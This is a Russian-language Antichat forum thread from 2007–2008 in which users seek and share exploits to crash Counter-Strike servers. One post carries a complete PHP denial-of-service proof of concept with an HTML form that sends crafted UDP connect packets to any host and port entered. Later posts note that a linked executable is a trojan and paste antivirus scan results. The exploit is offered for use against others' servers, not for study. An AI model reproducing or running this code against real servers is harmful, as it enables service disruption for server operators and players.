Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

04.12.2007, 19:15
|
|
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме: 5265510
Репутация:
455
|
|
Вроде он
|
|
|

06.12.2007, 12:25
|
|
Новичок
Регистрация: 19.04.2007
Сообщений: 1
Провел на форуме: 83125
Репутация:
0
|
|
На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?
|
|
|

06.12.2007, 20:54
|
|
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме: 829460
Репутация:
170
|
|
/me пацталом.... нет. есть тока .txt сплоит... его надо вставлять вместо имени и коннактицо
|
|
|

06.12.2007, 21:00
|
|
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме: 3326855
Репутация:
702
|
|
перевыложите куда-нить...а то все ссылки битые.
|
|
|

16.12.2007, 12:43
|
|
Новичок
Регистрация: 13.12.2007
Сообщений: 2
Провел на форуме: 51278
Репутация:
2
|
|
Сообщение от SHaDoW[RF]
а как узнать пасс?
Никак. Ибо спроси у админа =))
|
|
|

16.12.2007, 17:47
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
Провел на форуме: 261355
Репутация:
38
|
|
а есть ещё актуальные сплойты под кс?
|
|
|

10.02.2008, 00:06
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме: 2808062
Репутация:
155
|
|
и те старые еще актуальны, но не на всех сервах
большое спасибо ребята за работу!!
|
|
|

10.02.2008, 02:59
|
|
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме: 500895
Репутация:
60
|
|
Сообщение от inlanger
перевыложите куда-нить...а то все ссылки битые.
Ещё нашёл сплоит...
1я часть:
Код:
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>
<style type="text/css">
input {
width: 150px;
}
td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}
span.err {
color: red;
}
span.ok {
color: green;
}
</style>
</head>
<body onload="checkpass()">
<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">
<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>
<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>
<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>
<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>
<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>
</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>
2я часть
PHP код:
<?php
/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/
ini_set("display_errors","0");
function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}
function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}
function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}
function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}
function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}
IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>
Последний раз редактировалось DCRM; 10.02.2008 в 03:32..
|
|
|

10.02.2008, 20:41
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме: 2544458
Репутация:
243
|
|
по твоей ссылке троян
|
|
|

11.02.2008, 03:00
|
|
Познающий
Регистрация: 12.12.2006
Сообщений: 89
Провел на форуме: 500895
Репутация:
60
|
|
Сообщение от Витян
по твоей ссылке троян
Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то)
Код:
Антивирус Версия Обновление Результат
AhnLab-V3 2008.2.4.10 2008.02.04 -
AntiVir 7.6.0.62 2008.02.04 TR/Agent.act.2
Authentium 4.93.8 2008.02.04 -
Avast 4.7.1098.0 2008.02.03 Win32:Agent-PJA
AVG 7.5.0.516 2008.02.04 Generic6.WSG
BitDefender 7.2 2008.02.04 Trojan.Generic.15882
CAT-QuickHeal 9.00 2008.02.04 -
ClamAV 0.92 2008.02.04 -
DrWeb 4.44.0.09170 2008.02.04 -
eSafe 7.0.15.0 2008.01.28 suspicious Trojan/Worm
eTrust-Vet 31.3.5509 2008.02.04 -
Ewido 4.0 2008.02.04 -
FileAdvisor 1 2008.02.04 High threat detected
Fortinet 3.14.0.0 2008.02.04 Grayware
F-Prot 4.4.2.54 2008.02.03 -
F-Secure 6.70.13260.0 2008.02.04 -
Ikarus T3.1.1.20 2008.02.04 Trojan.Win32.Agent.act
Kaspersky 7.0.0.125 2008.02.04 -
McAfee 5222 2008.02.04 -
Microsoft 1.3204 2008.02.04 -
NOD32v2 2847 2008.02.04 -
Norman 5.80.02 2008.02.04 -
Panda 9.0.0.4 2008.02.04 Trj/Downloader.MDW
Prevx1 V2 2008.02.04 Generic.Malware
Rising 20.29.22.00 2008.01.30 -
Sophos 4.26.0 2008.02.04 Mal/Generic-A
Sunbelt 2.2.907.0 2008.02.02 -
Symantec 10 2008.02.04 Trojan Horse
TheHacker 6.2.9.208 2008.02.04 -
VBA32 3.12.6.0 2008.02.03 Trojan.Win32.Agent.act
VirusBuster 4.3.26:9 2008.02.04 -
Webwasher-Gateway 6.6.2 2008.02.04 Trojan.Agent.act.2
p.s. А скрин то я с этого exe делал... ну да ладно)
Последний раз редактировалось DCRM; 11.02.2008 в 18:02..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|